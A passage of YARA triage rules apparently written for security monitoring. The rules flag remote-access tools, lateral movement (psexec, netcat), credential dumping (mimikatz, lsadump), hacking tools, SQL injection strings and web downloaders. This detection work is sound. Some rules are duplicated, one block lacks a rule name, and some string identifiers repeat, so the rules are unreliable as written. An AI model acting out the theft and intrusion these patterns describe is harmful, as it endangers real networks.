$string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
$string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
$string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
$string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
$string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
$string128 = "Mozilla/5.0 (Windows NT 9;"
$string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"
$string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1"
$string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
$string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
$string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
$string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
$string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
$string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
$string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0"
$string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
$string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
$string140 = "Mozilla/5.0 WinInet"
$string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
$string143 = "Netscape"
$string144 = "O/9.27 (W; U; Z)"
$string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
$string147 = "RookIE/1.0"
$string148 = "SIPDROID"
$string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
$string150 = "Sametime Community Agent"
$string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
$string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
$string154 = "X-FORWARDED-FOR"
$string155 = "XMRig"
$string157 = "backdoorbot"
$string158 = "ccminer"
$string159 = "hots scot"
$string160 = "nocase"
$string161 = "nsis_inetc (mozilla)"
$string162 = "ruler"
$string163 = "sample"
$string164 = "user-agent"
condition:
1 of them
}
Generic Triage Yara Rules
rule RemoteControlUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud Remote Control Url Accessed"
strings:
$string0 = "teamviewer" nocase
$string1 = "splashtop" nocase
$string2 = "ammyy" nocase
$string3 = "mikogo" nocase
$string4 = "uvnc" nocase
$string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
$string6 = "logmein" nocase
$string7 = "join.me" nocase
$string8 = "realvnc" nocase
$string9 = "dameware" nocase
$string10 = "dwservice" nocase
$string11 = "anydesk" nocase
condition:
1 of them
}
rule WebMailUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Web Mail Url Accessed"
strings:
$string0 = "mail.yahoo.com" nocase
$string1 = "@gmail.com" nocase
$string2 = "outlook.live.com" nocase
$string3 = "mail.protonmail.com" nocase
$string4 = "zoho.com" nocase
$string5 = "yandex.com" nocase
$string6 = "tutanota.com" nocase
$string7 = "kolbanow.com" nocase
$string8 = "fastmail.com" nocase
$string10 = "posteo.de" nocase
$string11 = "startmail.com" nocase
$string12 = "runbox.com" nocase
$string13 = "mailfence.com" nocase
$string14 = "countermail.com" nocase
condition:
1 of them
}
rule CloudFileStorageUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud File Storage Url Accessed"
strings:
$string0 = "dropbox.com" nocase
$string1 = "drive.google.com" nocase
$string2 = "wetransfer.com" nocase
$string3 = "pcloud.com" nocase
$string4 = "tresorit.com" nocase
$string5 = "sync.com" nocase
$string6 = "onedrive.live.com" nocase
$string7 = ".box.com" nocase
$string8 = "spideroak.com" nocase
$string9 = "mega.nz" nocase
$string10 = "jottacloud.com" nocase
$string11 = "teamdrive.com" nocase
$string12 = "mediafire.com" nocase
$string13 = "cloudup.com" nocase
$string14 = "cloudme.com" nocase
condition:
1 of them
}
rule LateralMovementAttempt
{
meta:
author = "@neonprimetime"
description = "Lateral Movement Attempt"
strings:
$string0 = "mstsc" nocase
$string1 = "psexec" nocase
$string2 = "\\nc.exe" nocase
$string3 = "/nc.exe" nocase
$string2 = "\\nc64.exe" nocase
$string3 = "/nc64.exe" nocase
$string2 = "\\netcat.exe" nocase
$string3 = "/netcat.exe" nocase
$string4 = "putty.exe" nocase
$string5 = "mobax" nocase
$string6 = "securecrt" nocase
$string7 = "ssh.exe" nocase
$string8 = "winrs" nocase
condition:
1 of them
}
rule ShortExecutableName
{
meta:
author = "@neonprimetime"
description = "Short Executable Name"
strings:
$string0 = "/0.exe" nocase
$string1 = "/1.exe" nocase
$string2 = "/2.exe" nocase
$string3 = "/3.exe" nocase
$string4 = "/4.exe" nocase
$string5 = "/5.exe" nocase
$string6 = "/6.exe" nocase
$string7 = "/7.exe" nocase
$string8 = "/8.exe" nocase
$string9 = "/9.exe" nocase
$string10 = "\\0.exe" nocase
$string11 = "\\1.exe" nocase
$string12 = "\\2.exe" nocase
$string13 = "\\3.exe" nocase
$string14 = "\\4.exe" nocase
$string15 = "\\5.exe" nocase
$string16 = "\\6.exe" nocase
$string17 = "\\7.exe" nocase
$string18 = "\\8.exe" nocase
$string19 = "\\9.exe" nocase
$string20 = "/a.exe" nocase
$string21 = "/b.exe" nocase
$string22 = "/c.exe" nocase
$string23 = "/d.exe" nocase
$string24 = "/e.exe" nocase
$string25 = "/f.exe" nocase
$string26 = "/g.exe" nocase
$string27 = "/h.exe" nocase
$string28 = "/i.exe" nocase
$string29 = "/j.exe" nocase
$string30 = "/k.exe" nocase
$string31 = "/l.exe" nocase
$string32 = "/m.exe" nocase
$string33 = "/n.exe" nocase
$string34 = "/o.exe" nocase
$string35 = "/p.exe" nocase
$string36 = "/q.exe" nocase
$string37 = "/r.exe" nocase
$string38 = "/s.exe" nocase
$string39 = "/t.exe" nocase
$string40 = "/u.exe" nocase
$string41 = "/v.exe" nocase
$string42 = "/w.exe" nocase
$string43 = "/x.exe" nocase
$string44 = "/y.exe" nocase
$string45 = "/z.exe" nocase
$string46 = "\\a.exe" nocase
$string47 = "\\b.exe" nocase
$string48 = "\\c.exe" nocase
$string49 = "\\d.exe" nocase
$string50 = "\\e.exe" nocase
$string51 = "\\f.exe" nocase
$string52 = "\\g.exe" nocase
$string53 = "\\h.exe" nocase
$string54 = "\\i.exe" nocase
$string55 = "\\j.exe" nocase
$string56 = "\\k.exe" nocase
$string57 = "\\l.exe" nocase
$string58 = "\\m.exe" nocase
$string59 = "\\n.exe" nocase
$string60 = "\\o.exe" nocase
$string61 = "\\p.exe" nocase
$string62 = "\\q.exe" nocase
$string63 = "\\r.exe" nocase
$string64 = "\\s.exe" nocase
$string65 = "\\t.exe" nocase
$string66 = "\\u.exe" nocase
$string67 = "\\v.exe" nocase
$string68 = "\\w.exe" nocase
$string69 = "\\x.exe" nocase
$string70 = "\\y.exe" nocase
$string71 = "\\z.exe" nocase
condition:
1 of them
}
rule PolicyViolation
{
meta:
author = "@neonprimetime"
description = "Policy Violation"
strings:
$string0 = "disableuac" nocase
condition:
1 of them
}
rule LivingOffLandCommand
{
meta:
author = "@neonprimetime"
description = "Living Off the Land Command"
strings:
$string0 = "mshta.exe" nocase
$string1 = "nbstat.exe" nocase
$string5 = "/query.exe" nocase
$string6 = "\\query.exe" nocase
$string8 = "bitsadmin.exe" nocase
$string9 = "curl.exe" nocase
$string10 = "wget.exe" nocase
$string11 = "systeminfo.exe" nocase
$string12 = "certutil.exe" nocase
condition:
1 of them
}
rule PhishingAttachmentThemePossible
{
meta:
author = "@neonprimetime"
description = "Phishing Attachment Theme Possible"
strings:
$string0a = "invoice." nocase
$string0b = "invoice " nocase
$string1 = "factura" nocase
$string2 = "wiretransfer" nocase
$string4a = "payment" nocase
$string4b = "payment." nocase
$string6a = "eFAX " nocase
$string6b = "eFAX." nocase
$string7 = "Fattura" nocase
$string8 = "Enquiry" nocase
$string9 = "QUOTATION" nocase
$string10 = "receipt " nocase
$string10 = "receipt." nocase
$string11a = "payroll." nocase
$string11b = "payroll " nocase
$string12 = "PO#" nocase
$string13 = "Proforma" nocase
$string14 = "Purchase." nocase
$string14 = "Purchase " nocase
$string14 = "PurchaseOrder" nocase
condition:
1 of them
}
rule ClearTextPasswordFile
{
meta:
author = "@neonprimetime"
description = "Clear Text Password File"
strings:
$string0 = "password.txt" nocase
$string1 = "pwd.txt" nocase
$string2 = "passwd.txt" nocase
$string3 = "password.doc" nocase
$string4 = "pwd.doc" nocase
$string5 = "passwd.doc" nocase
$string6 = "password.xls" nocase
$string7 = "pwd.xls" nocase
$string8 = "passwd.xls" nocase
$string9 = "passwords.txt" nocase
$string10 = "pwds.txt" nocase
$string11 = "passwds.txt" nocase
$string12 = "passwords.doc" nocase
$string13 = "pwds.doc" nocase
$string14 = "passwds.doc" nocase
$string15 = "passwords.xls" nocase
$string16 = "pwds.xls" nocase
$string17 = "passwds.xls" nocase
$string18 = "web.config" nocase
$string19 = "application.config" nocase
condition:
1 of them
}
rule AdminUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Admin Web Pages"
strings:
$string0 = "/admin/" nocase
$string1 = "/wp-admin/" nocase
condition:
1 of them
}
rule HackingToolFound
{
meta:
author = "@neonprimetime"
description = "Hacking Tool Found"
strings:
$string0 = "kali.exe" nocase
$string2 = "wireshark" nocase
$string3 = "bloodhound" nocase
$string4 = "obfuscation" nocase
$string5 = "shellcode" nocase
$string6 = "keylogger" nocase
$string7 = "bypassuac" nocase
$string8 = "tokenmanipulation" nocase
$string10 = "passhash" nocase
$string11 = "kerberoast" nocase
$string12 = "ninja" nocase
$string13 = "memorynps" nocase
$string14 = "metasploit" nocase
$string15 = "smbexec" nocase
$string16 = "gpppassword" nocase
$string17 = "arpscan" nocase
$string18 = "dnscat" nocase
$string19 = "aircrack" nocase
$string20 = "bulletspassview" nocase
$string21 = "chromepass" nocase
$string22 = "credentialsfileview" nocase
$string23 = "echo.exe" nocase
$string24 = "hydra.exe" nocase
$string25 = "iepv.exe" nocase
$string26 = "inssidersetup" nocase
$string28 = "mailpv.exe" nocase
$string29 = "ministumblersetup" nocase
$string33 = "netpass.exe" nocase
$string34 = "netstumbler" nocase
$string35 = "nltest.exe" nocase
$string36 = "ophcrack" nocase
$string37 = "rdpv.exe" nocase
$string38 = "setspn" nocase
$string39 = "sniffpass" nocase
$string40 = "vaultpasswordview" nocase
$string41 = "\\ver.exe" nocase
$string42 = "vncpassview" nocase
$string43 = "webbrowserpassview" nocase
condition:
1 of them
}
rule HackingCodeFound
{
meta:
author = "@neonprimetime"
description = "Hacking Code Found"
strings:
$string0 = "WriteProcessMemory" nocase
$string1 = "VirtualAlloc" nocase
$string2 = "SetWindowsHook" nocase
$string3 = "SHCreateThread" nocase
$string4 = "FromBase64String" nocase
$string5 = "PromptForCredential" nocase
$string6 = "AdjustTokenPrivileges" nocase
$string7 = "KerberosRequestorSecurityToken" nocase
$string8 = "UnsafeNativeMethods" nocase
$string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
$string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
$string11 = "TOKEN_IMPERSONATE" nocase
$string12 = "TOKEN_ELEVATION" nocase
$string13 = "TOKEN_ALL_ACCESS" nocase
condition:
1 of them
}
rule PasswordDumpAttempt
{
meta:
author = "@neonprimetime"
description = "Password Dump Temp"
strings:
$string0 = "mimikatz" nocase
$string1 = "procdump" nocase
$string3 = "hashdump" nocase
$string4 = "pwdump" nocase
$string5 = "lsadump" nocase
condition:
1 of them
}
rule ExternalDriveAccessed
{
meta:
author = "@neonprimetime"
description = "External Drive Accessed"
strings:
$string4 = "file:///f:/" nocase
$string6 = "file:///g:/" nocase
$string8 = "mfeprom" nocase
condition:
1 of them
}
rule HackerOutputFile
{
meta:
author = "@neonprimetime"
description = "Hacker Output Files"
strings:
$string0 = "acls.csv" nocase
$string1 = "bloodhound.csv" nocase
$string2 = "dump.csv" nocase
$string3 = "dump.xml" nocase
$string4 = "dump.zip" nocase
$string5 = "firewall.txt" nocase
$string6 = "group_memberships.csv" nocase
$string7 = "hashdump.txt" nocase
$string8 = "local_admins.csv" nocase
$string9 = "lsadump.txt" nocase
$string10 = "lsass.dmp" nocase
$string11 = "lsassdump.dmp" nocase
$string12 = "mimikatz.xls" nocase
$string13 = "mini.dmp" nocase
$string14 = "netscan.xml" nocase
$string15 = "nmap.csv" nocase
$string16 = "nmap.txt" nocase
$string17 = "nmap.xml" nocase
$string18 = "openvas.csv" nocase
$string19 = "pwdump.txt" nocase
$string20 = "secretsdump.txt" nocase
$string21 = "targets.txt" nocase
$string22 = "trusts.csv" nocase
$string23 = "user_sessions.csv" nocase
$string24 = "bloodhound.bin" nocase
$string25 = ".gnmap" nocase
$string26 = ".nessus" nocase
$string27 = ".nmap" nocase
$string28 = "p0wn" nocase
condition:
1 of them
}
rule HackerUrl
{
meta:
author = "@neonprimetime"
description = "Hacker Url"
strings:
$string1 = "kali." nocase
$string2 = "/kali/" nocase
$string3 = "kali-" nocase
$string4 = "backbox." nocase
$string5 = "/backbox/" nocase
$string6 = "backbox-" nocase
$string7 = "blackarch." nocase
$string8 = "/blackarch/" nocase
$string9 = "blackarch-" nocase
$string10 = "caine-live." nocase
$string11 = "/caine-live/" nocase
$string12 = "caine-live-" nocase
$string13 = "deftlinux." nocase
$string14 = "/deftlinux/" nocase
$string15 = "deftlinux-" nocase
$string16 = "parrotsec." nocase
$string17 = "/parrotsec/" nocase
$string18 = "parrotsec-" nocase
$string19 = "altlinux./altlinux/" nocase
$string20 = "altlinux-" nocase
$string21 = "digi77." nocase
$string22 = "/digi77/" nocase
$string23 = "digi77-" nocase
$string24 = ".paterva." nocase
$string25 = "portswigger." nocase
$string26 = "exploit-db." nocase
$string27 = "/exploit-db/" nocase
$string28 = "exploit-db-" nocase
$string29 = "parrot.sh" nocase
$string30 = "/parrot.sh/" nocase
$string31 = "basealt.ru" nocase
$string32 = "/basealt.ru/" nocase
$string33 = "basealt.ru-" nocase
$string34 = "0day.today" nocase
$string35 = "/0day.today/" nocase
$string36 = "0day.today-archstrike." nocase
$string37 = "/archstrike/" nocase
$string38 = "archstrike-" nocase
condition:
1 of them
}
rule PUPSoftware
{
meta:
author = "@neonprimetime"
description = "Potentially Unwanted Software"
strings:
$string0 = "adusetup" nocase
$string1 = "advanced driver" nocase
$string2 = "anytimeastrology" nocase
$string3 = "aplusgamer" nocase
$string4 = "apnsetup" nocase
$string5 = "apnstub" nocase
$string6 = "ascsetup" nocase
$string7 = "astromenda" nocase
$string8 = "atozmanuals" nocase
$string9 = "atwrun" nocase
$string10 = "audiotoaudio" nocase
$string11 = "bringmesports" nocase
$string12 = "bytefence" nocase
$string13 = "calendarspark" nocase
$string14 = "ccleaner" nocase
$string15 = "citysearch" nocase
$string16 = "convertpdfsnowtooltab" nocase
$string17 = "coupon companion" nocase
$string18 = "couponscom" nocase
$string19 = "cursormania" nocase
$string20 = "dailybibleguide" nocase
$string21 = "dailyrecipeguidetooltab" nocase
$string22 = "dailywellnessguide" nocase
$string23 = "dictionaryboss" nocase
$string24 = "directionsandmap" nocase
$string25 = "discoverancestry" nocase
$string26 = "discoverliveradio" nocase
$string27 = "disk-defrag-setup" nocase
$string28 = "downspeedtest" nocase
$string29 = "driver-updater-setup" nocase
$string30 = "driver.talent" nocase
$string31 = "driverassist-setup" nocase
$string32 = "driverdoc" nocase
$string33 = "drivereasy" nocase
$string34 = "driverrestore" nocase
$string35 = "driversupport" nocase
$string36 = "drivertalent" nocase
$string37 = "drivertoolkit" nocase
$string38 = "driverupdate-" nocase
$string39 = "driverupdate-downloader" nocase
$string40 = "driverupdate-setup" nocase
$string41 = "driverwhiz" nocase
$string42 = "easeware" nocase
$string43 = "easydriverpro" nocase
$string44 = "easyhomedecorating" nocase
$string45 = "easypdfcombine" nocase
$string46 = "easyphotoedit" nocase
$string47 = "eliteunzip" nocase
$string48 = "emailaccessonline" nocase
$string49 = "everyday lookup" nocase
$string50 = "everydaylookup" nocase
$string51 = "filefanatic" nocase
$string52 = "filesharefanatic" nocase
$string53 = "flashplayerpro" nocase
$string54 = "flightsearchapp" nocase
$string55 = "freemakevideoconvertersetup" nocase
$string56 = "freemanuals" nocase
$string57 = "freeradiocast" nocase
$string58 = "fromdoctopdftooltab" nocase
$string59 = "funcustomcreations" nocase
$string60 = "gamingassassin" nocase
$string61 = "gamingwonderland" nocase
$string62 = "garden enthusiast" nocase
$string63 = "gardeningenthusiast" nocase
$string64 = "getflightinfo" nocase
$string65 = "getformsonline" nocase
$string66 = "gettvstreamnow" nocase
$string67 = "gifables" nocase
$string68 = "happinessinfusion" nocase
$string69 = "headlinealley" nocase
$string70 = "howtosimplified" nocase
$string71 = "howtosuite" nocase
$string72 = "inboxace" nocase
$string73 = "internetspeedtracker" nocase
$string74 = "knowthebible" nocase
$string75 = "localcrimewatcher" nocase
$string76 = "mapsgalaxy" nocase
$string77 = "marineaquariumlite" nocase
$string78 = "mergedocsonline" nocase
$string79 = "mydailyrunway" nocase
$string80 = "myeasylotto" nocase
$string81 = "myformsfinder" nocase
$string82 = "myfuncards" nocase
$string83 = "mynewsguide" nocase
$string84 = "mypcbackup" nocase
$string85 = "myradioplayer" nocase
$string86 = "myscrapnook" nocase
$string87 = "mysocialshortcut" nocase
$string88 = "mytelevisionhq" nocase
$string89 = "mytransitguide" nocase
$string90 = "myweatherradar" nocase
$string91 = "mywebface" nocase
$string92 = "notehomepage" nocase
$string93 = "onlinemapfinder" nocase
$string94 = "openfreely" nocase
$string95 = "packagetracer" nocase
$string96 = "pckeeper" nocase
$string97 = "pdfconverterhq" nocase
$string98 = "photofriendzy" nocase
$string99 = "playpoptrivia" nocase
$string100 = "playthruplayer" nocase
$string101 = "popularscreensavers" nocase
$string102 = "ppc-software" nocase
$string103 = "premierdownloadmanager" nocase
$string104 = "procleaningsoftware" nocase
$string105 = "productivityboss" nocase
$string106 = "productmanualsfinder" nocase
$string107 = "propccleaner" nocase
$string108 = "puzzlegamesdaily" nocase
$string109 = "quotationcafe" nocase
$string110 = "qyuninst" nocase
$string111 = "radiorage" nocase
$string112 = "readingfanatic" nocase
$string113 = "registry-cleaner" nocase
$string114 = "regservo" nocase
$string115 = "removedt" nocase
$string116 = "safepcrepair" nocase
$string117 = "scenichomepage" nocase
$string118 = "searchbar" nocase
$string119 = "searchformsonline" nocase
$string120 = "searchpredict" nocase
$string121 = "slimcleanerplus" nocase
$string122 = "smsfrombrowser" nocase
$string123 = "snapmyscreen" nocase
$string124 = "soccerinferno" nocase
$string125 = "spyhunter" nocase
$string126 = "studyhq" nocase
$string127 = "sweepstakesalley" nocase
$string128 = "tbieaddin.dll" nocase
$string129 = "televisionfanatic" nocase
$string130 = "ticketxplorer" nocase
$string131 = "timewhackers" nocase
$string132 = "tooltabextension.dll" nocase
$string133 = "totalrecipesearch" nocase
$string134 = "trackapackage" nocase
$string135 = "translationbuddy" nocase
$string136 = "unifiedlogger.dll" nocase
$string137 = "utility chest" nocase
$string138 = "videodownloadconverter" nocase
$string139 = "votinstw" nocase
$string140 = "votprx" nocase
$string141 = "wb-setup" nocase
$string142 = "web_bar" nocase
$string143 = "webdiscover" nocase
$string144 = "webdiscoverbrowserdownloaderwebesc" nocase
$string145 = "webext_dl" nocase
$string146 = "winwb" nocase
$string147 = "yourtemplatefindertooltab" nocase
$string148 = "ysearchsettool" nocase
$string149 = "ysearchutilsvc" nocase
condition:
1 of them
}
rule ActiveDirectoryDomainFlag
{
meta:
author = "@neonprimetime"
description = "AD domain flag"
strings:
$string0 = " /domain " nocase
condition:
1 of them
}
rule ActiveDirectoryCreateFlag
{
meta:
author = "@neonprimetime"
description = "AD Create flag"
strings:
$string0 = " /add " nocase
$string1 = " /create " nocase
condition:
1 of them
}
rule MetasploitPort
{
meta:
author = "@neonprimetime"
description = "Metasploit Port"
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
rule AdminFileShareAccess
{
meta:
author = "@neonprimetime"
description = "Admin File Share Access"
strings:
$string0 = "admin$" nocase
condition:
1 of them
}
rule TeamViewerPort
{
meta:
author = "@neonprimetime"
description = "TeamViewer Port"
strings:
$string0 = ":5938" nocase
condition:
1 of them
}
rule ActiveDirectoryCriticalGroup
{
meta:
author = "@neonprimetime"
description = "Critical AD groups"
strings:
$string0 = "domain admins" nocase
$string1 = "enterprise admins" nocase
$string2 = "schema admins" nocase
$string3 = "workstation admins" nocase
$string4 = "dns admins" nocase
$string5 = "server admins" nocase
condition:
1 of them
}
rule NewUser
{
meta:
author = "@neonprimetime"
description = "New User Commands"
strings:
$string0 = "new-localuser" nocase
$string1 = "new-aduser" nocase
condition:
1 of them
}
rule WebDownloader
{
meta:
author = "@neonprimetime"
description = "Web Downloader"
strings:
$string0 = "DownloadFile(" nocase
$string1 = "DownloadString" nocase
$string2 = "WebRequest" nocase
$string3 = "wget" nocase
$string4 = "bitstransfer" nocase
condition:
1 of them
}
rule McAfeeQuarantineFile
{
meta:
author = "@neonprimetime"
description = "McAfee Quarantine File"
strings:
$string0 = "\\quarantine\\" nocase
$string1 = ".bup" nocase
condition:
1 of them
}
rule VulnerabilityScanner
{
meta:
author = "@neonprimetime"
description = "Vulnerability Scanner"
strings:
$string0 = "AngryIP" nocase
$string1a = "\\Nmap " nocase
$string1b = "/Nmap." nocase
$string1c = " Nmap " nocase
$string1d = " Nmap." nocase
$string2 = "Nessus" nocase
$string3 = "sqlmap" nocase
$string4 = "nikto" nocase
$string5 = "wpscan" nocase
$string6 = "hyrda" nocase
$string7 = "dirbuster" nocase
$string8 = "masscan" nocase
$string9 = "morfeus" nocase
$string10 = "sqlninja" nocase
condition:
1 of them
}
rule SqlInjection
{
meta:
author = "@neonprimetime"
description = "Sql Injection"
strings:
$string0 = "UNION+ALL+SELECT" nocase
$string1 = ",NULL,NULL" nocase
$string2 = "AND+SLEEP" nocase
$string3 = "PG_SLEEP" nocase
$string4 = "WAITFOR+DELAY" nocase
$string5 = "CONCAT(0x" nocase
$string6 = "UNION+SELECT" nocase
$string7 = "--+" nocase
$string8 = "')UNION ALL SELECT" nocase
$string9 = ",NULL,NULL" nocase
$string10 = "AND SLEEP" nocase
$string11 = "WAITFOR DELAY" nocase
$string12 = "CONTACT(0x" nocase
$string13 = "UNION SELECT" nocase
$string14 = "UNION+ALL+SELECT" nocase
$string15 = "AND+SLEEP" nocase
$string16 = "WAITFOR+DELAY" nocase
$string17 = "UNION+SELECT)" nocase
condition:
1 of them
}
{
meta:
author = "@neonprimetime"
description = "Cloud Remote Control Url Accessed"
strings:
$string0 = "teamviewer" nocase
$string1 = "splashtop" nocase
$string2 = "ammyy" nocase
$string3 = "mikogo" nocase
$string4 = "uvnc" nocase
$string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
$string6 = "logmein" nocase
$string7 = "join.me" nocase
$string8 = "realvnc" nocase
$string9 = "dameware" nocase
$string10 = "dwservice" nocase
$string11 = "anydesk" nocase
condition:
1 of them
}
rule WebMailUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Web Mail Url Accessed"
strings:
$string0 = "mail.yahoo.com" nocase
$string1 = "@gmail.com" nocase
$string2 = "outlook.live.com" nocase
$string3 = "mail.protonmail.com" nocase
$string4 = "zoho.com" nocase
$string5 = "yandex.com" nocase
$string6 = "tutanota.com" nocase
$string7 = "kolbanow.com" nocase
$string8 = "fastmail.com" nocase
$string10 = "posteo.de" nocase
$string11 = "startmail.com" nocase
$string12 = "runbox.com" nocase
$string13 = "mailfence.com" nocase
$string14 = "countermail.com" nocase
condition:
1 of them
}
rule CloudFileStorageUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud File Storage Url Accessed"
strings:
$string0 = "dropbox.com" nocase
$string1 = "drive.google.com" nocase
$string2 = "wetransfer.com" nocase
$string3 = "pcloud.com" nocase
$string4 = "tresorit.com" nocase
$string5 = "sync.com" nocase
$string6 = "onedrive.live.com" nocase
$string7 = ".box.com" nocase
$string8 = "spideroak.com" nocase
$string9 = "mega.nz" nocase
$string10 = "jottacloud.com" nocase
$string11 = "teamdrive.com" nocase
$string12 = "mediafire.com" nocase
$string13 = "cloudup.com" nocase
$string14 = "cloudme.com" nocase
condition:
1 of them
}
rule LateralMovementAttempt
{
meta:
author = "@neonprimetime"
description = "Lateral Movement Attempt"
strings:
$string0 = "mstsc" nocase
$string1 = "psexec" nocase
$string2 = "\\nc.exe" nocase
$string3 = "/nc.exe" nocase
$string2 = "\\nc64.exe" nocase
$string3 = "/nc64.exe" nocase
$string2 = "\\netcat.exe" nocase
$string3 = "/netcat.exe" nocase
$string4 = "putty.exe" nocase
$string5 = "mobax" nocase
$string6 = "securecrt" nocase
$string7 = "ssh.exe" nocase
$string8 = "winrs" nocase
condition:
1 of them
}
rule ShortExecutableName
{
meta:
author = "@neonprimetime"
description = "Short Executable Name"
strings:
$string0 = "/0.exe" nocase
$string1 = "/1.exe" nocase
$string2 = "/2.exe" nocase
$string3 = "/3.exe" nocase
$string4 = "/4.exe" nocase
$string5 = "/5.exe" nocase
$string6 = "/6.exe" nocase
$string7 = "/7.exe" nocase
$string8 = "/8.exe" nocase
$string9 = "/9.exe" nocase
$string10 = "\\0.exe" nocase
$string11 = "\\1.exe" nocase
$string12 = "\\2.exe" nocase
$string13 = "\\3.exe" nocase
$string14 = "\\4.exe" nocase
$string15 = "\\5.exe" nocase
$string16 = "\\6.exe" nocase
$string17 = "\\7.exe" nocase
$string18 = "\\8.exe" nocase
$string19 = "\\9.exe" nocase
$string20 = "/a.exe" nocase
$string21 = "/b.exe" nocase
$string22 = "/c.exe" nocase
$string23 = "/d.exe" nocase
$string24 = "/e.exe" nocase
$string25 = "/f.exe" nocase
$string26 = "/g.exe" nocase
$string27 = "/h.exe" nocase
$string28 = "/i.exe" nocase
$string29 = "/j.exe" nocase
$string30 = "/k.exe" nocase
$string31 = "/l.exe" nocase
$string32 = "/m.exe" nocase
$string33 = "/n.exe" nocase
$string34 = "/o.exe" nocase
$string35 = "/p.exe" nocase
$string36 = "/q.exe" nocase
$string37 = "/r.exe" nocase
$string38 = "/s.exe" nocase
$string39 = "/t.exe" nocase
$string40 = "/u.exe" nocase
$string41 = "/v.exe" nocase
$string42 = "/w.exe" nocase
$string43 = "/x.exe" nocase
$string44 = "/y.exe" nocase
$string45 = "/z.exe" nocase
$string46 = "\\a.exe" nocase
$string47 = "\\b.exe" nocase
$string48 = "\\c.exe" nocase
$string49 = "\\d.exe" nocase
$string50 = "\\e.exe" nocase
$string51 = "\\f.exe" nocase
$string52 = "\\g.exe" nocase
$string53 = "\\h.exe" nocase
$string54 = "\\i.exe" nocase
$string55 = "\\j.exe" nocase
$string56 = "\\k.exe" nocase
$string57 = "\\l.exe" nocase
$string58 = "\\m.exe" nocase
$string59 = "\\n.exe" nocase
$string60 = "\\o.exe" nocase
$string61 = "\\p.exe" nocase
$string62 = "\\q.exe" nocase
$string63 = "\\r.exe" nocase
$string64 = "\\s.exe" nocase
$string65 = "\\t.exe" nocase
$string66 = "\\u.exe" nocase
$string67 = "\\v.exe" nocase
$string68 = "\\w.exe" nocase
$string69 = "\\x.exe" nocase
$string70 = "\\y.exe" nocase
$string71 = "\\z.exe" nocase
condition:
1 of them
}
rule PolicyViolation
{
meta:
author = "@neonprimetime"
description = "Policy Violation"
strings:
$string0 = "disableuac" nocase
condition:
1 of them
}
rule LivingOffLandCommand
{
meta:
author = "@neonprimetime"
description = "Living Off the Land Command"
strings:
$string0 = "mshta.exe" nocase
$string1 = "nbstat.exe" nocase
$string5 = "/query.exe" nocase
$string6 = "\\query.exe" nocase
$string8 = "bitsadmin.exe" nocase
$string9 = "curl.exe" nocase
$string10 = "wget.exe" nocase
$string11 = "systeminfo.exe" nocase
$string12 = "certutil.exe" nocase
condition:
1 of them
}
rule PhishingAttachmentThemePossible
{
meta:
author = "@neonprimetime"
description = "Phishing Attachment Theme Possible"
strings:
$string0a = "invoice." nocase
$string0b = "invoice " nocase
$string1 = "factura" nocase
$string2 = "wiretransfer" nocase
$string4a = "payment" nocase
$string4b = "payment." nocase
$string6a = "eFAX " nocase
$string6b = "eFAX." nocase
$string7 = "Fattura" nocase
$string8 = "Enquiry" nocase
$string9 = "QUOTATION" nocase
$string10 = "receipt " nocase
$string10 = "receipt." nocase
$string11a = "payroll." nocase
$string11b = "payroll " nocase
$string12 = "PO#" nocase
$string13 = "Proforma" nocase
$string14 = "Purchase." nocase
$string14 = "Purchase " nocase
$string14 = "PurchaseOrder" nocase
condition:
1 of them
}
rule ClearTextPasswordFile
{
meta:
author = "@neonprimetime"
description = "Clear Text Password File"
strings:
